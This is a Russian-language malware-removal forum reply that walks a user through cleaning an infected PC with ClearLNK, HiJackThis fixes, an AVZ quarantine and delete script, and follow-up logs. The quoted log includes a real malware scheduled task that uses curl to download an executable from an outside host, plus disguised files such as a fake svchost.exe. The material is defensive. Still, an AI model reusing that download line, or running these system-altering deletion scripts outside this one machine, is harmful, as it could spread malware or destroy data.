Здравствуйте!
1. Скачайте ClearLNK и сохраните архив с утилитой на Рабочем столе.
* Распакуйте архив с утилитой в отдельную папку.
* Перенесите файл Check_Browsers_LNK.log из логов на ClearLNK как показано на рисунке

* Отчет о работе ClearLNK-<Дата>.log будет сохранен в папке LOG.
* Прикрепите этот отчет к своему следующему сообщению.
2. Вы сами устанавливали это ПО?
Код:
c:\users\Андрей\appdata\local\vivaldi\application\vivaldi.exe
C:\Program Files (x86)\Garena Plus\GarenaMessenger.exe
Если не пользуетесь, - удалите.
3. У вас установлено несколько антивирусов, остановитесь на каком-то одном.
360 Total Security
McAfee
Аvast
4. Пофиксите в HiJackThis.
Сама программа HiJackThis находится в папке AutoLogger, в подпапке HiJackThis
Код:
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://mail.ru/cnt/10445?gp=811013
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes: DefaultScope = {FFEBBF0A-C22C-4172-89FF-45215A135AC7} - Поиск@Mail.Ru - http://go.mail.ru/distib/ep/?q={SearchTerms}&product_id=%7BDE952E62-5F2D-4DBD-AAF9-0C747FB0B326%7D&gp=811014
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} - Поиск@Mail.Ru - http://go.mail.ru/distib/ep/?q={SearchTerms}&product_id=%7BDE952E62-5F2D-4DBD-AAF9-0C747FB0B326%7D&gp=811014
O2-32 - BHO: MRSearchPlugin - {8E8F97CD-60B5-456F-A201-73065652D099} - C:\Users\Андрей\AppData\Local\Mail.Ru\Sputnik\ie_addon_dll.dll
O4 - HKCU\..\RunOnce: [Application Restart #0] C:\Users\Андрей\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --load-extension="C:\Users\Андрей\AppData\Roaming\extensions\extensions_yandex,C:\Users\Андрей\AppData\Roaming\extensions\extension_yandex" --flag-switches-begin --flag-switches-end --disable-client-side-phishing-detection --profile-info --disable-field-trial-config --enable-proprietary-video-hw-decoding --enable-in-process-wmf-demuxer --external-app-null-path --external-app-data=null_data --restore-last-session
O4 - HKCU\..\StartupApproved\Run: [GameCenterMailRu] (2017/07/10)C:\Users\Андрей\AppData\Local\Mail.Ru\GameCenter\[email protected] -autostart
O4 - HKCU\..\StartupApproved\Run: [amigo] (2016/09/25)C:\Users\Андрей\AppData\Local\Amigo\Application\amigo.exe --no-startup-window (file missing)
O4 - HKCU\..\StartupApproved\Run: [ycAutoLaunch_428D6313FFDD39C5CEF69A47F32A9DE0] (2017/07/10)C:\Users\Андрей\AppData\Local\yc\Application\yc.exe /prefetch:5 (file missing)
O22 - Task (Ready): FileSystemDriver - C:\Users\Андрей\AppData\Local\FileSystemDriver\FileSystemDriver.exe --stid="14712" (file missing)
O22 - Task (Ready): MSI - C:\Users\Андрей\AppData\Roaming\Microsoft\msi.exe cnt=3 fts="dota_2_cheats_patch_7_05_zip\dota_2_cheats_patch_7_05_zip.exe" (file missing)
O22 - Task (Ready): SearchGo Task - C:\Users\Андрей\AppData\Local\SearchGo\searchgo.exe (file missing)
O22 - Task (Ready): curl - C:\Users\Андрей\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Андрей\AppData\Roaming\curl\curl.exe" (file missing)
O22 - Task (Ready): curls - C:\Users\Андрей\AppData\Roaming\curl\curl.exe (file missing)
O23 - Service S3: Mail.Ru Update Service - (mrupdsrv) - C:\Program Files (x86)\Mail.Ru\Update Service\mrupdsrv.exe (file missing)
5. Временно отключите защитное ПО.
Выполните скрипт AVZ.
Код:
begin
QuarantineFile('C:\Users\Андрей\appdata\roaming\svchost.exe','');
QuarantineFile('C:\Users\Андрей\appdata\locallow\searchgo\searchgo.dll','');
QuarantineFile('C:\Users\Андрей\appdata\local\wupdate\wupdate.exe','');
QuarantineFile('C:\Users\Андрей\AppData\Roaming\curl\curl.exe','');
DelCLSID('{0596C850-7BDD-4C9D-AFDF-873BE6890637}');
DelCLSID('{056D528D-CE28-4194-9BA3-BA2E9197FF8C}');
DelCLSID('{05B38830-F4E9-4329-978B-1DD28605D202}');
DelBHO('{2BC46CFA-4B00-4193-A7BD-6AD1D0BCB5BC}');
DelBHO('{598AEFC6-DD3C-4A63-9AC3-53FCF6155931}');
QuarantineFile('C:\Users\Андрей\AppData\Local\MEGAsync\ShellExtX32.dll','');
QuarantineFile('C:\Users\Андрей\AppData\Local\yc\Application\yc.exe','');
DeleteService('mrupdsrv');
StopService('mrupdsrv');
QuarantineFile('C:\Users\Андрей\AppData\Local\NVIDIA\NvBackend\ApplicationOntology\Ontology.dll','');
DeleteFile('C:\Users\Андрей\AppData\Local\NVIDIA\NvBackend\ApplicationOntology\Ontology.dll','32');
DeleteFile('C:\Program Files (x86)\Mail.Ru\Update Service\mrupdsrv.exe','32');
RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','amigo');
DeleteFile('C:\Users\Андрей\AppData\Local\Amigo\Application\amigo.exe','32');
RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','ycAutoLaunch_428D6313FFDD39C5CEF69A47F32A9DE0');
DeleteFile('C:\Users\Андрей\AppData\Local\yc\Application\yc.exe','32');
RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\RunOnce','Application Restart #0');
DeleteDirectory('C:\Users\Андрей\AppData\Roaming\extensions\extension_yandex');
DeleteDirectory('C:\Users\Андрей\AppData\Roaming\extensions');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved','{05B38830-F4E9-4329-978B-1DD28605D202}');
DeleteFile('C:\Users\Андрей\AppData\Local\MEGAsync\ShellExtX32.dll','32');
DeleteFileMask('C:\Users\Андрей\AppData\Local\MEGAsync','*',true);
DeleteDirectory('C:\Users\Андрей\AppData\Local\MEGAsync');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved','{056D528D-CE28-4194-9BA3-BA2E9197FF8C}');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved','{0596C850-7BDD-4C9D-AFDF-873BE6890637}');
DeleteFile('C:\Users\Андрей\AppData\LocalLow\SearchGo\searchgo.dll','32');
DeleteFileMask('C:\Users\Андрей\AppData\LocalLow\SearchGo','*',true);
DeleteDirectory('C:\Users\Андрей\AppData\LocalLow\SearchGo');
DeleteFile('C:\WINDOWS\system32\Tasks\curls','64');
DeleteFile('C:\Users\Андрей\AppData\Roaming\curl\curl.exe','32');
DeleteFileMask('C:\Users\Андрей\AppData\Roaming\curl','*',true);
DeleteDirectory('C:\Users\Андрей\AppData\Roaming\curl');
DeleteFile('C:\Users\Андрей\appdata\local\wupdate\wupdate.exe','32');
DeleteFileMask('C:\Users\Андрей\appdata\local\wupdate','*',true);
DeleteDirectory('C:\Users\Андрей\appdata\local\wupdate');
DeleteFile('C:\Users\Андрей\appdata\roaming\svchost.exe','32');
ExecuteSysClean;
ExecuteRepair(2);
ExecuteRepair(3);
ExecuteRepair(4);
ExecuteWizard('TSW',2,3,true);
ExecuteWizard('SCU',2,2,true);
RebootWindows(true);
end.
Компьютер перезагрузится.
Выполните скрипт AVZ.
Код:
begin
CreateQurantineArchive(GetAVZDirectory +'quarantine.zip');
end.
6. Пришлите архив карантина из папки AVZ.
7. Сделайте новые логи программой Autologger и пришлите их.
8. Сделайте лог утилитой AdwCleaner и пришлите его.
9. Скачайте Farbar Recovery Scan Tool
и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
- Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
- Нажмите кнопку Scan.
- После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
- Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.